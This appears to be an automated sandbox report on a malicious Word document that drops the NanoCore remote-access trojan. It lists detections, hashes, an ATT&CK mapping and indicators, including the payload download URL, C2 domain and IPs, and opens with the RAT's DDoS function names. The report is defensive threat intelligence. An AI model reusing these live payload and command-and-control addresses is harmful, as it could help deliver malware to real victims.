loodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match	File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D2626 bind,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D25F3 bind,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Access Token Manipulation1	Masquerading111	Input Capture11	Security Software Discovery21	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection312	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection312	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol223	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	System Information Discovery4	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing13	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
471e3984_by_Libranalysis.docx	6%	Virustotal		Browse
471e3984_by_Libranalysis.docx	2%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\v[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B75759.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	23%	ReversingLabs	ByteCode-MSIL.Backdoor.NanoBot
C:\Users\Public\vbc.exe	23%	ReversingLabs	ByteCode-MSIL.Backdoor.NanoBot

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.RegSvcs.exe.9a0000.14.unpack	100%	Avira	TR/NanoCore.fadte		Download File
9.2.RegSvcs.exe.400000.1.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Link
cutt.ly	1%	Virustotal	Browse
nta.hopto.org	2%	Virustotal	Browse
nassiru1166main.ddns.net	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
79.134.225.26	0%	Avira URL Cloud	safe
nassiru1166main.ddns.net	0%	Avira URL Cloud	safe
http://nta.hopto.org/reg/vbc.exe	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://nta.hopto.org/reg/	0%	Avira URL Cloud	safe
https://cutt.ly/dbzEXdF	0%	Avira URL Cloud	safe
http://nta.hopto.org/reg/v.dot	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cutt.ly	172.67.8.238	true	true	1%, Virustotal, Browse	unknown
nta.hopto.org	172.245.45.28	true	true	2%, Virustotal, Browse	unknown
nassiru1166main.ddns.net	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
79.134.225.26	true	Avira URL Cloud: safe	unknown
nassiru1166main.ddns.net	true	Avira URL Cloud: safe	unknown
http://nta.hopto.org/reg/vbc.exe	true	Avira URL Cloud: safe	unknown
http://nta.hopto.org/reg/v.dot	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp	false		high
http://nta.hopto.org/reg/	reg on nta.hopto.org.url.0.dr	false	Avira URL Cloud: safe	unknown
https://cutt.ly/dbzEXdF	dbzEXdF.url.0.dr	true	Avira URL Cloud: safe	unknown
https://github.com/unguest	vbc.exe	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	false		high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	vbc.exe.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.8.238	cutt.ly	United States	13335	CLOUDFLARENETUS	true
79.134.225.26	unknown	Switzerland	6775	FINK-TELECOM-SERVICESCH	true
172.245.45.28	nta.hopto.org	United States	36352	AS-COLOCROSSINGUS	true
104.22.1.232	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402828
Start date:	03.05.2021
Start time:	14:29:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 49s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	471e3984_by_Libranalysis (renamed file extension from none to docx)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@10/24@68/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 77% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 94% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:30:54	API Interceptor	83x Sleep call for process: EQNEDT32.EXE modified
14:30:58	API Interceptor	9x Sleep call for process: vbc.exe modified
14:31:01	API Interceptor	1797x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.8.238	request.doc	Get hash	malicious	Browse	cutt.ly/ck18DOr
	Inquiry Bulgaria.xls	Get hash	malicious	Browse	cutt.ly/AkBqUvK
	DHL-correction.xlsx	Get hash	malicious	Browse	cutt.ly/
79.134.225.26	b2NaDSFu9T.exe	Get hash	malicious	Browse
	Original title deed.xlsx	Get hash	malicious	Browse
	PpkzTxJVyC.exe	Get hash	malicious	Browse
	Original title deed.xlsx	Get hash	malicious	Browse
	jk55xlWn7a.exe	Get hash	malicious	Browse
	Qds5xiJaAX.exe	Get hash	malicious	Browse
	INVOICE.xlsx	Get hash	malicious	Browse
	owrCPP2YTC.exe	Get hash	malicious	Browse
	reorder17032021.PDF.exe	Get hash	malicious	Browse
	re-order15032021.PDF.exe	Get hash	malicious	Browse
	new order15032021.PDF.exe	Get hash	malicious	Browse
	CLEW enquiry 2021.PDF.exe	Get hash	malicious	Browse
	payment proof.png.exe	Get hash	malicious	Browse
	0001.exe	Get hash	malicious	Browse
	Purchase Order 2021-311743-045.xls.exe	Get hash	malicious	Browse
	CLEW enquiry 2021.PDF.exe	Get hash	malicious	Browse
	Purchase.exe	Get hash	malicious	Browse
	Quote.exe	Get hash	malicious	Browse
	Quotation.exe	Get hash	malicious	Browse
	invoicedHusrLjViL.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cutt.ly	Specificatiile produsului.xlsx	Get hash	malicious	Browse	172.67.8.238
	be1aca64_by_Libranalysis.docx	Get hash	malicious	Browse	104.22.0.232
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	104.22.0.232
	SecuriteInfo.com.Exploit.Siggen3.3974.31629.xls	Get hash	malicious	Browse	104.22.1.232
	ORDER COPY-326.xlsm	Get hash	malicious	Browse	104.22.0.232
	ORDER COPY-326.xlsm	Get hash	malicious	Browse	172.67.8.238
	ORDER COPY-326.xlsm	Get hash	malicious	Browse	104.22.0.232
	SecuriteInfo.com.Trojan.Siggen12.41502.7197.exe	Get hash	malicious	Browse	104.22.0.232
	7mn2CWSogl.doc	Get hash	malicious	Browse	172.67.8.238
	xFu11SNTPY.exe	Get hash	malicious	Browse	172.67.8.238
	6xm3a7oyWB.doc	Get hash	malicious	Browse	172.67.8.238
	653Ec54XeF.exe	Get hash	malicious	Browse	104.22.1.232
	Xojlq3Pjho.doc	Get hash	malicious	Browse	172.67.8.238
	upbck.xlsx	Get hash	malicious	Browse	104.22.0.232
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	172.67.8.238
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	104.22.0.232
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	22-2-2021 .xlsx	Get hash	malicious	Browse	104.22.1.232
	Shipping_Document.xlsx	Get hash	malicious	Browse	104.22.1.232
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	e0d55c2c_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f95f4b12_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2f119d38_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	59fcec0a_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2dbff645_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	9a59e803_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	65dcd283_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d8b77647_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	b7016660_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2cd7f5f9_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	47f9e048_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	e8046237_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f06a0327_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d227c1f6_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	0ca13b51_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	fc2a5233_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f8c8f21a_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	129ce885_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	82f8b579_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	5a49e6fd_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
FINK-TELECOM-SERVICESCH	PO#KV18RE001_A5491NGOCQUANGTRADEPRODUCTIONSERVICE5.exe	Get hash	malicious	Browse	79.134.225.91
	b2NaDSFu9T.exe	Get hash	malicious	Browse	79.134.225.26
	Original title deed.xlsx	Get hash	malicious	Browse	79.134.225.26
	ORDER INQUIRY.doc	Get hash	malicious	Browse	79.134.225.52
	To1sRo1E8P.exe	Get hash	malicious	Browse	79.134.225.25
	BhTxt5BUvy.exe	Get hash	malicious	Browse	79.134.225.25
	SCAN_ORDER & SAMPLES.exe	Get hash	malicious	Browse	79.134.225.52
	Apr-advance payment #5972939.exe	Get hash	malicious	Browse	79.134.225.9
	PpkzTxJVyC.exe	Get hash	malicious	Browse	79.134.225.26
	Original title deed.xlsx	Get hash	malicious	Browse	79.134.225.26
	swift copy.exe	Get hash	malicious	Browse	79.134.225.48
	swift copy.exe	Get hash	malicious	Browse	79.134.225.48
	jk55xlWn7a.exe	Get hash	malicious	Browse	79.134.225.26
	Qds5xiJaAX.exe	Get hash	malicious	Browse	79.134.225.26
	INVOICE.xlsx	Get hash	malicious	Browse	79.134.225.26
	UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc	Get hash	malicious	Browse	79.134.225.91
	Payment-Confirmation_Copy.exe	Get hash	malicious	Browse	79.134.225.108
	owrCPP2YTC.exe	Get hash	malicious	Browse	79.134.225.26
	Payment Advice-BCS_ECS9522020090915390034_3159_952.jar	Get hash	malicious	Browse	79.134.225.59
	nciv84yXK1.exe	Get hash	malicious	Browse	79.134.225.7
CLOUDFLARENETUS	SecuriteInfo.com.Trojan.GenericKD.36812138.16843.exe	Get hash	malicious	Browse	104.21.19.200
	a4.dll	Get hash	malicious	Browse	104.20.184.68
	LAjei2S8bg.exe	Get hash	malicious	Browse	104.21.19.200
	HFTeISi0wZQeZi6.exe	Get hash	malicious	Browse	104.21.19.200
	don.exe	Get hash	malicious	Browse	172.67.218.244
	8a793b14_by_Libranalysis.exe	Get hash	malicious	Browse	104.18.24.31
	QEpa8OLm9Z.exe	Get hash	malicious	Browse	172.67.188.154
	c7b8f5dc_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.19.200
	6de2089f_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.133.233
	e17486cd_by_Libranalysis.exe	Get hash	malicious	Browse	104.17.62.50
	O1E623TjjW.exe	Get hash	malicious	Browse	104.21.24.135
	calvary petroleum.doc	Get hash	malicious	Browse	104.21.19.200
	34zNZUh9hTEGU4a.exe	Get hash	malicious	Browse	104.21.19.200
	b75e7348_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	PV GAS THI VAI LNG RECEIVING TERMINAL EXPANSION PROJECT.exe	Get hash	malicious	Browse	104.21.19.200
	eHV0IaHe2btEhvP.exe	Get hash	malicious	Browse	172.67.188.154
	BOQ and specifications.exe	Get hash	malicious	Browse	104.21.19.200
	WaybillDoc_7349796565.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.18.214
	a3aa510e_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	calvary petroleum.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	Sidertaglio PO_20210305.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	17cff4b8_by_Libranalysis.xlsx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	be1aca64_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	SWIFT COPY.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	INV2104_01.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	vessel details.xlsx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	2af49a1a_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	RFQ - 0421.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	RFQ for MR 29483 for Affordable Villa.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	Enquiry of GI Pipes - Enq 557.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	e2e95366_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	Evaluation quoter.docx	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	DHL SHIPMENT NOTIFICATION,6207428452.ppt	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	RFQ 7349.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	PO737383866366363.pps	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	VALVES_QBCG0409.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	FROCH GEN INQUIRY.doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
	Taewoo Hang Co., Ltd..doc	Get hash	malicious	Browse	172.67.8.238 104.22.1.232
7dcce5b76c8b17472d024758970a406b	presupuesto.xlsx	Get hash	malicious	Browse	172.67.8.238
	ORDER INQUIRY.doc	Get hash	malicious	Browse	172.67.8.238
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Heur.3869.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Heur.12433.xls	Get hash	malicious	Browse	172.67.8.238
	Documents_1906038956_974385067.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Heur.3421.xls	Get hash	malicious	Browse	172.67.8.238
	diagram-586750002.xlsm	Get hash	malicious	Browse	172.67.8.238
	94a5cd81_by_Libranalysis.xls	Get hash	malicious	Browse	172.67.8.238
	Documents_585904356_2104184844.xls	Get hash	malicious	Browse	172.67.8.238
	e9251e1f_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238
	statistic-1048881972.xlsm	Get hash	malicious	Browse	172.67.8.238
	Specificatiile produsului.xlsx	Get hash	malicious	Browse	172.67.8.238
	be1aca64_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238
	f.xlsm	Get hash	malicious	Browse	172.67.8.238
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.8.238
	db7db588_by_Libranalysis.xls	Get hash	malicious	Browse	172.67.8.238
	statistic-118970052.xlsm	Get hash	malicious	Browse	172.67.8.238
	diagram-2027138819.xlsm	Get hash	malicious	Browse	172.67.8.238
	documents-857527454.xlsm	Get hash	malicious	Browse	172.67.8.238

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Original title deed.xlsx	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	Original title deed.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.307681977309823
Encrypted:	false
SSDEEP:	48:I38f+OIfY7smftf3PDE8f0fg6e3ABpXEh9krgZnAKNuu7bv6FfG:KlEDE4ABFET0gZtTF
MD5:	70981D15F76905E7AB46AF7AE911F37C
SHA1:	D2CEC6C55124C015BB9F20E51D52B3F55176CE4E
SHA-256:	8DA40CFCCDBFBC690C45E0334F7DEC535FB8B15D1182811C88A552B68F64D464
SHA-512:	59F586FE7ACB13C542806CC65278AE7C95C6DC2E8F31ABA228884415D37510F562BDF9DAC5A51B3EE4451F404461677458F4A2C67F3F3515FC129DA599F77448
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.g.[:..D....C.S,...X.F...Fa.q.............................+.{X.)L....<vk...........v...jI......`.....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F68D7747-BDFB-4414-9397-CF20B10DDA5F}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	156816
Entropy (8bit):	0.6661310659442163
Encrypted:	false
SSDEEP:	96:KvSLVU8FFLtDbmX5obBuPuAr3ZwUvOzzRNbWrX8KpK8KvX7x+8KK2PK8KK3Prwxn:JngXOYGAOUvkzrWrs2wBZMZI
MD5:	542FCC55542831510D462F761310183C
SHA1:	4DFA45F5FC6BB88DCAB2F4CEB67C3ACFFE715BFE
SHA-256:	380B7403ACEAEB5196A27FDCE641BA6104A4040CB9BDC28817791754233CB5A7
SHA-512:	B96FF7EE880EFF053699AC54282ABAC625186967F993EC7CE869AA8D39500430796385EB2BE3AF3DFFCCFCF5E8E96F74F4A90EB7B82670A6069D21CF9B081495
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z..c..).N.HAv.q6<S,...X.F...Fa.q............................}\|...?.D.A....Q.........c....`.J.j%.'.......................................................................t...t...t...t.............................................................................................................................................................................................................................................................................................................................^I..%M.BM...V.........c....`.J.j%.'...................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.232257788735253
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlzXHlzSYOSHh7lYwSGlWlLOhl+f276:yPdPDDblzUrSgdGMly622
MD5:	22CF7B38A7D84A913CB1AC73862B9040
SHA1:	84CC75798239B9DD2B58DE2821975A7695FC0509
SHA-256:	344D17461C0835A17C696215481EC8AD042599A7BDA5BD6857C9247F6C2F4B72
SHA-512:	2CF8640EA1265C78343F937EDDE6F7C1A12BA2ECF53BFD54403B0F4D250C96CF735869B6360844EE6500058CBA20CD2719DD18730A96992C599A0E6A31E52296
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.F.6.8.D.7.7.4.7.-.B.D.F.B.-.4.4.1.4.-.9.3.9.7.-.C.F.2.0.B.1.0.D.D.A.5.F.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.3080063352191261
Encrypted:	false
SSDEEP:	48:I3i8OfxXPsNctObcGz3xA3x5ofo2f33EtmTDHa+rsNFRHiSK3x+LsH8S7bCXISK4:Ki8e1Pntaf3dDHaGTAscEAsc2F/nyeM
MD5:	8EE922B560D6E32CF3EBD4525125D01C
SHA1:	0F4E213EA17EF91C5B34017849FA9CBF06CD7E97
SHA-256:	9DBBBD1FEB858B98025323E54ECD16DF6FEDDFACBF36D082009631E0276CAC88
SHA-512:	042FC9F03C6EAF7DC4649046E6B89FCAB11359C2C533E0FDC12D788FD1A41ECD407CBBDFB09FC025E2B1E72518A525A748E5320AC328634F8523A48C8F7F8218
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z...n.yvD..(...dMS,...X.F...Fa.q............................g..-.(.C.Z$..M...........M.ue..O.&.rpAlV....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{45D439A1-3537-4B88-BE41-836CEF25E81A}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	149973
Entropy (8bit):	0.277881459927413
Encrypted:	false
SSDEEP:	48:I3JukEC57Ppo+hG6a3JhG6JE1iZp/++Q6J6qw3dAHJdPhFz7b6t61bUtp1jbHGW:KLBNH8/HCqM7MWY1kp1n
MD5:	FA46F0C9BBEAF4419794870D1848CA82
SHA1:	DC4B895C48E7E22D14DBB37A68F6E7041E3D466B
SHA-256:	6C96D69A92E55C5B88A46D06B16C40F41F738BD0E6356EDAC39878AEA29EA752
SHA-512:	60C3ED19CAD33E90E726A9252F5AAAD4736789C649068F821B2022298826AD371DEC6C4A13EF3EAE177CAB746E83058D7D1429844B88C1CD612F05814E42E63C
Malicious:	false
Reputation:	low
